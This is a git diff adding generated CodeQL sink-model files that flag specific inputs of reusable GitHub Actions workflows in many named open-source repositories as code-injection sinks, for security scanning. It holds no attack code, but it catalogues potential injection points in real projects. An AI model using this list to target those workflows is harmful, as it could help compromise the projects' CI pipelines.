00000000000..d3cc8e73b70 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "inputs.constraints", "code-injection", "generated"] + - ["schemastore/schemastore/src/negative_test/github-workflow/reusable-workflow-input-must-declare-type.yaml", "*", "inputs.constraints", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml new file mode 100644 index 00000000000..a9f8401aab2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "inputs.job_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml new file mode 100644 index 00000000000..acf43426e56 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "inputs.run", "code-injection", "generated"] + - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "inputs.ruby-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml new file mode 100644 index 00000000000..3c9178a9125 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "inputs.latest", "code-injection", "generated"] + - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "inputs.tag", "code-injection", "generated"] + - ["shaka-project/shaka-packager/.github/workflows/build.yaml", "*", "inputs.self_hosted", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml new file mode 100644 index 00000000000..24603c25a77 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.ignore_test_status", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.test_filter", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.browser_filter", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.pr", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml new file mode 100644 index 00000000000..29f01c24bed --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "inputs.package_installation_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml new file mode 100644 index 00000000000..acad489dbe5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["softfever/orcaslicer/.github/workflows/build_deps.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml new file mode 100644 index 00000000000..e15b6d33042 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "inputs.option", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml new file mode 100644 index 00000000000..12c9f97b7a4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "inputs.commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml new file mode 100644 index 00000000000..685944420aa --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "inputs.version", "code-injection", "generated"] + - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "inputs.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml new file mode 100644 index 00000000000..884c3d154ad --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "inputs.verSion", "code-injection", "generated"] + - ["speedb-io/speedb/.github/workflows/build_macos_ARM.yml", "*", "inputs.verSion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml new file mode 100644 index 00000000000..799958a7fee --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml new file mode 100644 index 00000000000..32d3e59e1f8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "inputs.marks", "code-injection", "generated"] + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "inputs.python-version", "code-injection", "generated"] + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-dbt.yml", "*", "inputs.dbt-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml new file mode 100644 index 00000000000..f2893eb2407 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] + - ["stdlib-js/stdlib/.github/workflows/lint_autofix.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] + - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "inputs.user", "code-injection", "generated"] + - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml new file mode 100644 index 00000000000..ea3b2029f82 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.patch", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.minor", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.major", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.preName", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.pre", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml new file mode 100644 index 00000000000..74bdcb807c8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "inputs.patch_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml new file mode 100644 index 00000000000..4c0442abd2b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["supabase/auth/.github/workflows/publish.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml new file mode 100644 index 00000000000..39c81d39066 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "inputs.image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml new file mode 100644 index 00000000000..82f5ba4be74 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "inputs.workflow_run", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_head_sha", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml new file mode 100644 index 00000000000..ffb08a8fa2e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.map", "code-injection", "generated"] + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.minor", "code-injection", "generated"] + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.major", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml new file mode 100644 index 00000000000..4012908e7e9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "inputs.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml new file mode 100644 index 00000000000..a1af8280ebc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "inputs.target", "code-injection", "generated"] + - ["tiann/kernelsu/.github/workflows/avd-kernel.yml", "*", "inputs.manifest_name", "code-injection", "generated"] + - ["tiann/kernelsu/.github/workflows/wsa-kernel.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml new file mode 100644 index 00000000000..84de5681fea --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "inputs.asan", "code-injection", "generated"] + - ["tiledb-inc/tiledb/.github/workflows/append-release-cmake.yml", "*", "inputs.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml new file mode 100644 index 00000000000..c9e8b5c23c0 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "inputs.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml new file mode 100644 index 00000000000..80dde7f2fc0 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "inputs.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml new file mode 100644 index 00000000000..1ffaa4e1cd0 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "inputs.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml new file mode 100644 index 00000000000..48b35d83c70 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "inputs.framework", "code-injection", "generated"] + - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "inputs.configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml new file mode 100644 index 00000000000..e1a0c8a9fcf --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "inputs.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml new file mode 100644 index 00000000000..71cd3fed3ed --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["urbit/urbit/.github/workflows/shared.yml", "*", "inputs.pace", "code-injection", "generated"] + - ["urbit/urbit/.github/workflows/shared.yml", "*", "inputs.next", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml new file mode 100644 index 00000000000..47f53f495f8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "inputs.server_id", "code-injection", "generated"] + - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "inputs.secondary_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml new file mode 100644 index 00000000000..1b592aa91cc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "inputs.hz", "code-injection", "generated"] + - ["vert-x3/vertx-hazelcast/.github/workflows/ci.yml", "*", "inputs.hz", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml new file mode 100644 index 00000000000..db4e957a87a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "inputs.workspace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml new file mode 100644 index 00000000000..c3642c84f63 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml new file mode 100644 index 00000000000..3e6691f0e8f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "inputs.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml new file mode 100644 index 00000000000..733c2e20a71 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "inputs.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows.yml", "*", "inputs.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows-msvc.yml", "*", "inputs.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-ubuntu.yml", "*", "inputs.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-manylinux.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml new file mode 100644 index 00000000000..cb80f74e4e8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "inputs.profile", "code-injection", "generated"] + - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml new file mode 100644 index 00000000000..0f78ea086a6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml @@ -0,0 +1,21 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-k8s-version.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-k8s-version-and-container-registry.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-container-registry.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.scope", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "inputs.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "inputs.scope", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "inputs.packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml new file mode 100644 index 00000000000..e2bf8f96fa9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "inputs.tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml new file mode 100644 index 00000000000..4a8500a147e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.build-arguments", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.test-arguments", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.maven-repo-path", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build.yml", "*", "inputs.git-log-number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml new file mode 100644 index 00000000000..3e362cebc58 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.target", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.source", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.prerelease", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.version", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "inputs.version", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "inputs.channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml new file mode 100644 index 00000000000..9e5f6e3541e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "inputs.config_file", "code-injection", "generated"] + - ["zenml-io/zenml/.github/workflows/integration-test-slow.yml", "*", "inputs.test_environment", "code-injection", "generated"] + - ["zenml-io/zenml/.github/workflows/integration-test-fast.yml", "*", "inputs.test_environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml new file mode 100644 index 00000000000..89fbb5dbf70 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "inputs.needs_context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml new file mode 100644 index 00000000000..26f9f659a2d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.image_name", "code-injection", "generated"] + - 